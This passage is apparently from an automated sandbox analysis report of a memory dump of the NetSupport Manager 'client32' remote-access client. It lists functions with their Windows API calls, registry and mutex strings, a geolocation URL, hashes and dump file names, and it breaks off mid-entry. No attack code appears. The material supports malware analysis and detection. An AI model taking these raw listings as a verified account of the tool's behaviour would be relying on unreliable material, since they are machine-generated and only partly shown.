111352b0 2949->2954 2951 11138f38-11138f3a 2950->2951 2952 11138ffc-11138ffe 2950->2952 2959 11138f5c-11138f69 call 110f8640 2951->2959 2960 11138f3c-11138f3e 2951->2960 2955 11139000-11139002 2952->2955 2956 1113901d-1113902a call 110f8640 2952->2956 2957 11138f24 2953->2957 2958 11138f0c-11138f21 call 11131210 2953->2958 2954->2953 2954->2958 2962 11139013-1113901a call 11131210 2955->2962 2963 11139004-1113900e call 111352b0 2955->2963 2975 1113906f-11139071 2956->2975 2979 1113902c-1113903c IsWindowVisible 2956->2979 2957->2950 2958->2957 2959->2975 2976 11138f6f-11138f80 IsWindowVisible 2959->2976 2960->2959 2966 11138f40-11138f50 call 111352b0 2960->2966 2962->2956 2963->2962 2966->2959 2983 11138f52-11138f59 call 11131210 2966->2983 2975->2863 2976->2975 2981 11138f86-11138f96 call 111450a0 2976->2981 2979->2975 2982 1113903e-11139049 IsWindowVisible 2979->2982 2981->2975 2990 11138f9c-11138fb4 GetForegroundWindow IsWindowVisible 2981->2990 2982->2975 2985 1113904b-1113906d EnableWindow call 11131210 EnableWindow 2982->2985 2983->2959 2985->2975 2992 11138fc1-11138fcd call 11131210 2990->2992 2993 11138fb6-11138fbf EnableWindow 2990->2993 2996 11138fcf-11138fd5 2992->2996 2997 11138fde-11138ffb EnableWindow call 11161d01 2992->2997 2993->2992 2996->2997 2998 11138fd7-11138fd8 SetForegroundWindow 2996->2998 2998->2997
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76968400), ref: 111450D0
                                                                                                                                                                  • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                                                                                                  • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                                                                                                  • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                                                                                                • PostMessageA.USER32(000802A6,000006CF,00000007,00000000), ref: 11138E0F
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • SetWindowTextA.USER32(000802A6,00000000), ref: 11138EB7
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11138F7C
                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11138FAA
                                                                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000001), ref: 11138FE7
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11139038
                                                                                                                                                                • IsWindowVisible.USER32(000802A6), ref: 11139045
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000000), ref: 11139059
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000000), ref: 11138FBF
                                                                                                                                                                  • Part of subcall function 11131210: ShowWindow.USER32(000802A6,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                                                                                                • EnableWindow.USER32(000802A6,00000001), ref: 1113906D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                                                                                                • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                                                                                                • API String ID: 3453649892-3803836183
                                                                                                                                                                • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                                                                                                • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                                                                                                • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                                                                                                • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                                                                                                Function 110281A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                • wsprintfA.USER32 ref: 11028214
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                                                                                                • wsprintfA.USER32 ref: 11028291
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                                                                • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                                                                • API String ID: 512045693-419896573
                                                                                                                                                                • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                                                                                                • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                                                                                                • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                                                                                                • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                                                                                                Function 11085E10 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(PCIINV.DLL,59FD48C0,033B6EC0,033B6EB0,?,00000000,1118276C,000000FF,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085E45
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                                                                                                • wsprintfA.USER32 ref: 11085F1B
                                                                                                                                                                • wsprintfA.USER32 ref: 11085F32
                                                                                                                                                                • wsprintfA.USER32 ref: 11085F49
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                                                                                                  • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7572F550,?,?,110860C0,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085A98
                                                                                                                                                                  • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7572F550,?,?,110860C0,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085AAB
                                                                                                                                                                  • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7572F550,?,?,110860C0,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085ABE
                                                                                                                                                                  • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,7572F550,?,?,110860C0,?,11031942,033B6EC0,00000000,?,?,?), ref: 11085AD1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                                                                                                • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                                                                • API String ID: 4263811268-2492245516
                                                                                                                                                                • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                                                                                                • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                                                                                                • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                                                                                                • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                                                                                                Function 110304B8 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                                                                                                • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                                                                • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                                                                • API String ID: 2061479752-1320826866
                                                                                                                                                                • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                                                                                                • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                                                                                                • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                                                                                                • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                                                                                                Function 1102C410 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                                                                                                  • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1102C574
                                                                                                                                                                  • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                                                                                                  • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                                                                • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                                                                • API String ID: 596640303-1725438197
                                                                                                                                                                • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                                                                                                • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                                                                                                • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                                                                                                • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                                                                                                Function 11061700 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                                                                                                  • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                                                                                                  • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                                                                                                • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Enum$Open$CloseValue
                                                                                                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                                                                • API String ID: 2823542970-1528906934
                                                                                                                                                                • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                                                                                                • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                                                                                                • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                                                                                                • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                                                                                                Function 11137630 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11137692
                                                                                                                                                                  • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                                                                                                  • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                                                                                                  • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                                                                                                  • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111376A1
                                                                                                                                                                • _memset.LIBCMT ref: 111376E3
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                                                                                                • _strrchr.LIBCMT ref: 11137708
                                                                                                                                                                • _free.LIBCMT ref: 1113775A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
